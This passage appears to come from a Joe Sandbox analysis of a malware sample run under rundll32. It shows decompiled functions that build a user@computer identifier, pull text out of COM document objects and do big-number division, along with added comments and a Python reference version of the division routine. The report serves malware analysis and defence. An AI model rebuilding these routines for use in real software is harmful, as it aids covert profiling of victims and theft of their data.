                                      						_t46 = _t46 + 0xc;
                                      						 *_t27 = 0x2f;
                                      						_t13 = _t27 + 1; // 0x1
                                      						_t30 = _t13;
                                      					} while (_t38 > 8);
                                      					memcpy(_t30, _v8, _t38 + 1);
                                      				}
                                      				return _v12;
                                      			}

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04DE37CC,00000000,?,?,04DE653D,?,054A95B0), ref: 04DE72F2
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 04DE730A
                                      • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04DE37CC,00000000,?,?,04DE653D,?,054A95B0), ref: 04DE734E
                                      • memcpy.NTDLL(00000001,?,00000001), ref: 04DE736F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpy$AllocateHeaplstrlen
                                      • String ID: FNwPq
                                      • API String ID: 1819133394-3591455833
                                      • Opcode ID: 1b511f928bc25ec19a1e666c19bdd8e4e53f5d0e9bf9fd99f1deb908f1336064
                                      • Instruction ID: 1a941ce95b34049401685e9f2d78bba20c5a6d3f2f04d8bf5a7f592c999fd206
                                      • Opcode Fuzzy Hash: 1b511f928bc25ec19a1e666c19bdd8e4e53f5d0e9bf9fd99f1deb908f1336064
                                      • Instruction Fuzzy Hash: 66110672B00215AFD7109E6ADC84DAEBBAAEBC4360B050276F9049B341E7759E0087A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE3268() {
                                      				long _v8;
                                      				long _v12;
                                      				int _v16;
                                      				long _t39;
                                      				long _t43;
                                      				signed int _t47;
                                      				short _t51;
                                      				signed int _t52;
                                      				int _t56;
                                      				int _t57;
                                      				char* _t64;
                                      				short* _t67;
                                      
                                      				_v16 = 0;
                                      				_v8 = 0;
                                      				GetUserNameW(0,  &_v8);
                                      				_t39 = _v8;
                                      				if(_t39 != 0) {
                                      					_v12 = _t39;
                                      					_v8 = 0;
                                      					GetComputerNameW(0,  &_v8);
                                      					_t43 = _v8;
                                      					if(_t43 != 0) {
                                      						_v12 = _v12 + _t43 + 2;
                                      						_t64 = E04DE4DF6(_v12 + _t43 + 2 << 2);
                                      						if(_t64 != 0) {
                                      							_t47 = _v12;
                                      							_t67 = _t64 + _t47 * 2;
                                      							_v8 = _t47;
                                      							if(GetUserNameW(_t67,  &_v8) == 0) {
                                      								L7:
                                      								E04DE4C73(_t64);
                                      							} else {
                                      								_t51 = 0x40;
                                      								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                      								_t52 = _v8;
                                      								_v12 = _v12 - _t52;
                                      								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                      									goto L7;
                                      								} else {
                                      									_t56 = _v12 + _v8;
                                      									_v12 = _t56;
                                      									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t56 + 2, 0, 0);
                                      									_v8 = _t57;
                                      									if(_t57 == 0) {
                                      										goto L7;
                                      									} else {
                                      										_t64[_t57] = 0;
                                      										_v16 = _t64;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _v16;
                                      			}

                                      APIs
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 04DE327C
                                      • GetComputerNameW.KERNEL32(00000000,?), ref: 04DE3298
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 04DE32D2
                                      • GetComputerNameW.KERNEL32(?,?), ref: 04DE32F5
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04DE3318
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                      • String ID:
                                      • API String ID: 3850880919-0
                                      • Opcode ID: ae59b1d7e41185c24f79cd18eebadcdc04e9cc9e4e32d20b83920d5e221eb1fc
                                      • Instruction ID: ac718c6b77ef739f086af35be95686283bb69c75485a793b49ca96f4d9ef6b0a
                                      • Opcode Fuzzy Hash: ae59b1d7e41185c24f79cd18eebadcdc04e9cc9e4e32d20b83920d5e221eb1fc
                                      • Instruction Fuzzy Hash: 8021C9B6A00108FFDB11EFE6D994CFEBBB8EE44300B5044AAE511E7240DA34AB45DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(?), ref: 04DE33CF
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE34B4
                                        • Part of subcall function 04DE5D8F: SysAllocString.OLEAUT32(04DE9290), ref: 04DE5DDF
                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 04DE3507
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE3516
                                        • Part of subcall function 04DE3FDD: Sleep.KERNEL32(000001F4), ref: 04DE4025
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFree$ArrayDestroySafeSleep
                                      • String ID:
                                      • API String ID: 3193056040-0
                                      • Opcode ID: 256bb632aad43cff16f471bbf20a9b0a5982973b7d3baa425a75e0f975129fb8
                                      • Instruction ID: 9c6bcc452f4841aa54c2121b51d8ce4877342a701f97bec2b8cf91d8d114c951
                                      • Opcode Fuzzy Hash: 256bb632aad43cff16f471bbf20a9b0a5982973b7d3baa425a75e0f975129fb8
                                      • Instruction Fuzzy Hash: 14513C75600609AFDB02EFE9C844ABEB7B6FF88704B148469E905DB320DB75ED45CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 46%
                                      			E04DE5D8F(intOrPtr* __eax) {
                                      				void* _v8;
                                      				WCHAR* _v12;
                                      				void* _v16;
                                      				char _v20;
                                      				void* _v24;
                                      				intOrPtr _v28;
                                      				void* _v32;
                                      				intOrPtr _v40;
                                      				short _v48;
                                      				intOrPtr _v56;
                                      				short _v64;
                                      				intOrPtr* _t54;
                                      				intOrPtr* _t56;
                                      				intOrPtr _t57;
                                      				intOrPtr* _t58;
                                      				intOrPtr* _t60;
                                      				void* _t61;
                                      				intOrPtr* _t63;
                                      				intOrPtr* _t65;
                                      				short _t67;
                                      				intOrPtr* _t68;
                                      				intOrPtr* _t70;
                                      				intOrPtr* _t72;
                                      				intOrPtr* _t75;
                                      				intOrPtr* _t77;
                                      				intOrPtr _t79;
                                      				intOrPtr* _t83;
                                      				intOrPtr* _t87;
                                      				intOrPtr _t103;
                                      				intOrPtr _t109;
                                      				void* _t118;
                                      				void* _t122;
                                      				void* _t123;
                                      				intOrPtr _t130;
                                      
                                      				_t123 = _t122 - 0x3c;
                                      				_push( &_v8);
                                      				_push(__eax);
                                      				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                      				if(_t118 >= 0) {
                                      					_t54 = _v8;
                                      					_t103 =  *0x4dea348; // 0x6bd5a8
                                      					_t5 = _t103 + 0x4deb038; // 0x3050f485
                                      					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                      					_t56 = _v8;
                                      					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                      					if(_t118 >= 0) {
                                      						__imp__#2(0x4de9290);
                                      						_v28 = _t57;
                                      						if(_t57 == 0) {
                                      							_t118 = 0x8007000e;
                                      						} else {
                                      							_t60 = _v32;
                                      							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                      							_t87 = __imp__#6;
                                      							_t118 = _t61;
                                      							if(_t118 >= 0) {
                                      								_t63 = _v24;
                                      								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                      								if(_t118 >= 0) {
                                      									_t130 = _v20;
                                      									if(_t130 != 0) {
                                      										_t67 = 3;
                                      										_v64 = _t67;
                                      										_v48 = _t67;
                                      										_v56 = 0;
                                      										_v40 = 0;
                                      										if(_t130 > 0) {
                                      											while(1) {
                                      												_t68 = _v24;
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												_t123 = _t123;
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                      												if(_t118 < 0) {
                                      													goto L16;
                                      												}
                                      												_t70 = _v8;
                                      												_t109 =  *0x4dea348; // 0x6bd5a8
                                      												_t28 = _t109 + 0x4deb0bc; // 0x3050f1ff
                                      												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                      												if(_t118 >= 0) {
                                      													_t75 = _v16;
                                      													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                      													if(_t118 >= 0 && _v12 != 0) {
                                      														_t79 =  *0x4dea348; // 0x6bd5a8
                                      														_t33 = _t79 + 0x4deb078; // 0x76006f
                                      														if(lstrcmpW(_v12, _t33) == 0) {
                                      															_t83 = _v16;
                                      															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                      														}
                                      														 *_t87(_v12);
                                      													}
                                      													_t77 = _v16;
                                      													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                      												}
                                      												_t72 = _v8;
                                      												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                      												_v40 = _v40 + 1;
                                      												if(_v40 < _v20) {
                                      													continue;
                                      												}
                                      												goto L16;
                                      											}
                                      										}
                                      									}
                                      								}
                                      								L16:
                                      								_t65 = _v24;
                                      								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                      							}
                                      							 *_t87(_v28);
                                      						}
                                      						_t58 = _v32;
                                      						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                      					}
                                      				}
                                      				return _t118;
                                      			}





































                                      Instruction addresses (per-line address column of the side-by-side listing, not reproduced): 0x04de5d94 .. 0x04de5f20

                                      APIs
                                      • SysAllocString.OLEAUT32(04DE9290), ref: 04DE5DDF
                                      • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04DE5EC0
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE5ED9
                                      • SysFreeString.OLEAUT32(?), ref: 04DE5F08
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$Free$Alloclstrcmp
                                      • String ID:
                                      • API String ID: 1885612795-0
                                      • Opcode ID: 5fb4f3923b449f4bd03ac6d0aa7277c5d13a55055de2dd3438c3b8af4d0f99ed
                                      • Instruction ID: 8d59f4dc6b5c7a5ffeddbbf5c4e8f894712f3fa5e617580d660c4fca89cabecf
                                      • Opcode Fuzzy Hash: 5fb4f3923b449f4bd03ac6d0aa7277c5d13a55055de2dd3438c3b8af4d0f99ed
                                      • Instruction Fuzzy Hash: BF516E75E0051AEFCB00EFE9D4989AEB7B9FF88704B248585E915EB310D731AD41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E04DE35A2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                      				// Multi-limb (32-bit) unsigned long division, judging by the shape of the code:
                                      				// quotient limbs go to the global array at 0x4dea1d0, the remainder to the
                                      				// buffer at _a4. The operand roles noted below are an inference from the
                                      				// decompiled structure, not something the report states.
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				void _v156;
                                      				void _v428;
                                      				void* _t55;
                                      				unsigned int _t56;
                                      				signed int _t66;
                                      				signed int _t74;
                                      				void* _t76;
                                      				signed int _t79;
                                      				void* _t81;
                                      				void* _t92;
                                      				void* _t96;
                                      				signed int* _t99;
                                      				signed int _t101;
                                      				signed int _t103;
                                      				void* _t107;
                                      
                                      				_t92 = _a12;
                                      				_t101 = __eax;
                                      				_t55 = E04DE13E0(_a16, _t92);	// appears to return the divisor's significant limb count (n)
                                      				_t79 = _t55;
                                      				if(_t79 == 0) {
                                      					L18:
                                      					return _t55;	// zero divisor: nothing to do
                                      				}
                                      				_t56 =  *(_t92 + _t79 * 4 - 4);	// top limb of the divisor
                                      				_t81 = 0;
                                      				_t96 = 0x20;
                                      				if(_t56 == 0) {
                                      					L4:
                                      					_t97 = _t96 - _t81;	// normalisation shift = 32 - bit_length(top limb)
                                      					_v12 = _t96 - _t81;
                                      					E04DE7099(_t79,  &_v428);
                                      					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04DE381E(_t101,  &_v428, _a8, _t96 - _t81);	// dividend shifted left into _v428; carry-out limb stored on top
                                      					E04DE381E(_t79,  &_v156, _a12, _t97);	// divisor shifted left into _v156
                                      					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));	// top limb of the normalised divisor
                                      					_t66 = E04DE7099(_t101, 0x4dea1d0);
                                      					_t103 = _t101 - _t79;	// m - n: index of the most significant quotient limb
                                      					_a8 = _t103;
                                      					if(_t103 < 0) {
                                      						L17:
                                      						E04DE7099(_a16, _a4);
                                      						E04DE4191(_t79,  &_v428, _a4, _t97);	// denormalise the remainder (shift right) into _a4
                                      						memset( &_v428, 0, 0x10c);	// wipe both stack scratch buffers before returning
                                      						_t55 = memset( &_v156, 0, 0x84);
                                      						goto L18;
                                      					}
                                      					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;	// top limb of the current dividend window
                                      					do {
                                      						if(_v8 != 0xffffffff) {
                                      							// qhat = (u_top * 2^32 + u_next) / (v_top + 1). Dividing by v_top + 1
                                      							// never over-estimates, so the fix-up loop below only ever adds.
                                      							_push(1);
                                      							_push(0);
                                      							_push(0);
                                      							_push( *_t99);
                                      							L04DE81CA();	// _allmul: u_top << 32
                                      							_t74 = _t66 +  *(_t99 - 4);
                                      							asm("adc edx, esi");
                                      							_push(0);
                                      							_push(_v8 + 1);
                                      							_push(_t92);
                                      							_push(_t74);
                                      							L04DE81C4();	// _aulldiv: 64-bit / (v_top + 1)
                                      							if(_t92 > 0 || _t74 > 0xffffffff) {	// high dword set: clamp the estimate to 0xffffffff
                                      								_t74 = _t74 | 0xffffffff;
                                      								_v16 = _v16 & 0x00000000;
                                      							}
                                      						} else {
                                      							_t74 =  *_t99;	// v_top + 1 would overflow; the estimate is just u_top
                                      						}
                                      						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                      						_a12 = _t74;
                                      						_t76 = E04DE3ADE(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);	// window -= qhat * v; returns the amount to take off the top limb
                                      						while(1) {
                                      							 *_t99 =  *_t99 - _t76;
                                      							if( *_t99 != 0) {
                                      								goto L14;	// top limb still non-zero: window is still >= v
                                      							}
                                      							L13:
                                      							_t92 =  &_v156;
                                      							if(E04DE40E5(_t79, _t92, _t106) < 0) {	// compare the window with v; stop once it is smaller
                                      								break;
                                      							}
                                      							L14:
                                      							_a12 = _a12 + 1;	// qhat++ and subtract v once more
                                      							_t76 = E04DE5908(_t79,  &_v156, _t106, _t106);
                                      							 *_t99 =  *_t99 - _t76;
                                      							if( *_t99 != 0) {
                                      								goto L14;
                                      							}
                                      							goto L13;
                                      						}
                                      						_a8 = _a8 - 1;
                                      						_t66 = _a12;
                                      						_t99 = _t99 - 4;
                                      						 *(0x4dea1d0 + _a8 * 4) = _t66;	// store the finished quotient limb
                                      					} while (_a8 >= 0);
                                      					_t97 = _v12;
                                      					goto L17;
                                      				}
                                      				while(_t81 < _t96) {	// count the bits of the top limb by shifting it out
                                      					_t81 = _t81 + 1;
                                      					_t56 = _t56 >> 1;
                                      					if(_t56 != 0) {
                                      						continue;
                                      					}
                                      					goto L4;
                                      				}
                                      				goto L4;
                                      			}

                                      Instruction addresses (per-line address column of the side-by-side listing, not reproduced): 0x04de35a5 .. 0x04de3736

                                      APIs
                                      • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04DE3655
                                      • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04DE366B
                                      • memset.NTDLL ref: 04DE3714
                                      • memset.NTDLL ref: 04DE372A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset$_allmul_aulldiv
                                      • String ID:
                                      • API String ID: 3041852380-0
                                      • Opcode ID: f8287eef836e79344c9ac9972d872ee1dc1142d2fa10e547c11d3be85ff916db
                                      • Instruction ID: c351e2e998c991871fc93ef4b8cb06c0a7407a7da71b18c1ac77c68f0f8d9b32
                                      • Opcode Fuzzy Hash: f8287eef836e79344c9ac9972d872ee1dc1142d2fa10e547c11d3be85ff916db
                                      • Instruction Fuzzy Hash: 2F418F71B00219AFEB10BE6ACC40BFE77B5EF45714F104569F91997280DB70BA448BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%
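Added example, not code from the sample and not part of the Joe Sandbox report: a Python reference implementation of the schoolbook multi-limb division that E04DE35A2 above appears to implement, so the reading of the decompiled routine (normalisation shift, 64-by-32 quotient estimate divided by top limb + 1, multiply-subtract, add-one fix-up loop, right shift of the remainder) can be checked against Python's built-in divmod. The mapping of the helper names E04DE13E0, E04DE381E, E04DE3ADE, E04DE5908, E04DE40E5 and E04DE4191 to steps is an inference from the decompiled structure, and the sample's exact limb layout and index base are not reproduced.

```python
# Added example (not code from the sample or the Joe Sandbox report): schoolbook
# multi-limb unsigned division with 32-bit limbs, i.e. Knuth's Algorithm D with
# an under-estimated quotient limb. E04DE35A2 appears to implement this scheme;
# the mapping is an inference from the decompiled structure:
#   shift-right loop on the divisor's top limb        -> normalisation shift
#   _allmul(u_top, 0, 0, 1) / _aulldiv(.., top + 1)   -> under-estimated qhat
#   E04DE3ADE / E04DE5908 / E04DE40E5                 -> mul-sub, subtract, compare
#   0x4dea1d0 / _a4                                   -> quotient / remainder outputs
from typing import List, Tuple

LIMB_BITS = 32
LIMB_MASK = (1 << LIMB_BITS) - 1


def to_limbs(value: int, count: int) -> List[int]:
    """Little-endian 32-bit limbs of value, zero-padded to count limbs."""
    return [(value >> (LIMB_BITS * i)) & LIMB_MASK for i in range(count)]


def from_limbs(limbs: List[int]) -> int:
    return sum(limb << (LIMB_BITS * i) for i, limb in enumerate(limbs))


def significant_limbs(limbs: List[int]) -> int:
    n = len(limbs)
    while n > 0 and limbs[n - 1] == 0:
        n -= 1
    return n


def compare(a: List[int], b: List[int]) -> int:
    """Compare two equal-length limb arrays from the most significant limb down."""
    for x, y in zip(reversed(a), reversed(b)):
        if x != y:
            return -1 if x < y else 1
    return 0


def divmod_limbs(u: List[int], v: List[int]) -> Tuple[List[int], List[int]]:
    """Return (quotient, remainder) as little-endian limb arrays."""
    n = significant_limbs(v)
    if n == 0:
        raise ZeroDivisionError("divisor is zero")
    m = significant_limbs(u)
    if m < n:
        return [0], list(u)

    # Normalise: shift both operands left until the divisor's top limb has its
    # high bit set. The sample gets the shift by shifting the top limb right
    # until it is zero and counting (shift = 32 - bit_length).
    top, bits = v[n - 1], 0
    while bits < LIMB_BITS and top != 0:
        top >>= 1
        bits += 1
    s = LIMB_BITS - bits
    un = to_limbs(from_limbs(u) << s, m + 1)  # one extra limb for the carry-out
    vn = to_limbs(from_limbs(v) << s, n)
    vtop = vn[n - 1]

    q = [0] * (m - n + 1)
    for j in range(m - n, -1, -1):
        # Quotient-limb estimate. Dividing by (vtop + 1) never over-estimates,
        # so the fix-up below only ever adds to qhat, which is what the sample's
        # "increment counter, subtract v again" loop does.
        if vtop == LIMB_MASK:
            qhat = un[j + n]
        else:
            num = (un[j + n] << LIMB_BITS) | un[j + n - 1]
            qhat = min(num // (vtop + 1), LIMB_MASK)

        # un[j .. j+n] -= qhat * vn, limb by limb with carry and borrow.
        carry = borrow = 0
        for i in range(n):
            prod = qhat * vn[i] + carry
            carry = prod >> LIMB_BITS
            t = un[i + j] - (prod & LIMB_MASK) - borrow
            un[i + j] = t & LIMB_MASK
            borrow = 1 if t < 0 else 0
        # Cannot go negative because qhat is an under-estimate.
        un[j + n] = (un[j + n] - carry - borrow) & LIMB_MASK

        # Fix-up: while the window is still >= v, subtract v once more, qhat += 1.
        while un[j + n] != 0 or compare(un[j:j + n], vn) >= 0:
            qhat += 1
            borrow = 0
            for i in range(n):
                t = un[i + j] - vn[i] - borrow
                un[i + j] = t & LIMB_MASK
                borrow = 1 if t < 0 else 0
            un[j + n] = (un[j + n] - borrow) & LIMB_MASK
        q[j] = qhat

    # Denormalise the remainder (shift back right by s).
    r = to_limbs(from_limbs(un[:n]) >> s, n)
    return q, r


def divmod_reference(a: int, b: int) -> Tuple[int, int]:
    """Wrapper on Python ints so the limb routine can be checked against divmod()."""
    ua = to_limbs(a, max(1, (a.bit_length() + LIMB_BITS - 1) // LIMB_BITS))
    ub = to_limbs(b, max(1, (b.bit_length() + LIMB_BITS - 1) // LIMB_BITS))
    q, r = divmod_limbs(ua, ub)
    return from_limbs(q), from_limbs(r)
```

When checking this reading against the sample, feed divisors whose top limb is 0xffffffff as well as ordinary ones; that is the case E04DE35A2 guards with the _v8 != 0xffffffff test, where the v_top + 1 divisor would overflow. Hand-written limb arithmetic that zeroes its scratch buffers on exit is typical of embedded public-key or key-handling code, but what this sample uses it for is not established by the report.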

                                      C-Code - Quality: 78%
                                      			E04DE51D7(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                      				// Pulls a text string out of a COM object through two vtable calls, copies
                                      				// it into a private buffer and returns buffer and byte length via _a4/_a8.
                                      				// The report does not name the interface; the offsets are consistent with
                                      				// IHTMLDocument2::get_body (+0x24) followed by IHTMLElement::get_outerText
                                      				// (+0x100). That is an inference from the MSHTML vtable layout, not a
                                      				// finding of the report.
                                      				intOrPtr _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				intOrPtr _t26;
                                      				intOrPtr* _t28;
                                      				intOrPtr _t31;
                                      				intOrPtr* _t32;
                                      				void* _t39;
                                      				int _t46;
                                      				intOrPtr* _t47;
                                      				int _t48;
                                      
                                      				_t47 = __eax;
                                      				_push( &_v12);
                                      				_push(__eax);
                                      				_t39 = 0;
                                      				_t46 = 0;
                                      				_t26 =  *((intOrPtr*)( *__eax + 0x24))();	// vtable slot +0x24: (this, &_v12), returns a child object in _v12
                                      				_v8 = _t26;
                                      				if(_t26 < 0) {
                                      					L13:
                                      					return _v8;	// HRESULT
                                      				}
                                      				if(_v12 == 0) {
                                      					Sleep(0xc8);	// nothing returned yet: wait 200 ms and retry once
                                      					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                      				}
                                      				if(_v8 >= _t39) {
                                      					_t28 = _v12;
                                      					if(_t28 != 0) {
                                      						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);	// vtable slot +0x100: (this, BSTR* out)
                                      						_v8 = _t31;
                                      						if(_t31 >= 0) {
                                      							_t46 = lstrlenW(_v16);
                                      							if(_t46 != 0) {
                                      								_t46 = _t46 + 1;	// include the terminating NUL
                                      								_t48 = _t46 + _t46;	// byte length of the UTF-16 copy
                                      								_t39 = E04DE4DF6(_t48);	// internal allocator
                                      								if(_t39 == 0) {
                                      									_v8 = 0x8007000e;	// E_OUTOFMEMORY
                                      								} else {
                                      									memcpy(_t39, _v16, _t48);
                                      								}
                                      								__imp__#6(_v16);	// OLEAUT32 ordinal 6 = SysFreeString
                                      							}
                                      						}
                                      						_t32 = _v12;
                                      						 *((intOrPtr*)( *_t32 + 8))(_t32);	// vtable slot +8: IUnknown::Release
                                      					}
                                      					 *_a4 = _t39;	// copied string, or NULL if empty or allocation failed
                                      					 *_a8 = _t46 + _t46;	// byte length including the NUL (0 for an empty string)
                                      				}
                                      				goto L13;
                                      			}

                                      Instruction addresses (per-line address column of the side-by-side listing, not reproduced): 0x04de51e3 .. 0x04de5293

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeSleepStringlstrlenmemcpy
                                      • String ID:
                                      • API String ID: 1198164300-0
                                      • Opcode ID: b5c640fa2b2e0510d73b127f3c408f66871593049b927ff380fb0e7949672850
                                      • Instruction ID: db49e085c97aa16913daab1ab0da13e57f8663dc100a3794348bdf97a5e77c49
                                      • Opcode Fuzzy Hash: b5c640fa2b2e0510d73b127f3c408f66871593049b927ff380fb0e7949672850
                                      • Instruction Fuzzy Hash: 8F214175A01209FFCB11EFE5D9949AEBBB4FF49345B1041A9E901E7311EB70EA01CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE24BC(void* __esi) {
                                      				// Initialises a 0x38-byte context at __esi with two manual-reset events:
                                      				// +0x1c starts non-signalled, +0x20 starts signalled. Returns 1 on
                                      				// success, 0 otherwise; the first event is closed if the second fails.
                                      				struct _SECURITY_ATTRIBUTES* _v4;
                                      				void* _t8;
                                      				void* _t10;
                                      
                                      				_v4 = 0;
                                      				memset(__esi, 0, 0x38);
                                      				_t8 = CreateEventA(0, 1, 0, 0);	// manual-reset, initially non-signalled
                                      				 *(__esi + 0x1c) = _t8;
                                      				if(_t8 != 0) {
                                      					_t10 = CreateEventA(0, 1, 1, 0);	// manual-reset, initially signalled
                                      					 *(__esi + 0x20) = _t10;
                                      					if(_t10 == 0) {
                                      						CloseHandle( *(__esi + 0x1c));
                                      					} else {
                                      						_v4 = 1;
                                      					}
                                      				}
                                      				return _v4;
                                      			}

                                      Instruction addresses (per-line address column of the side-by-side listing, not reproduced): 0x04de24c6 .. 0x04de250c

                                      APIs
                                      • memset.NTDLL ref: 04DE24CA
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,770481D0), ref: 04DE24DF
                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04DE24EC
                                      • CloseHandle.KERNEL32(?), ref: 04DE24FE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
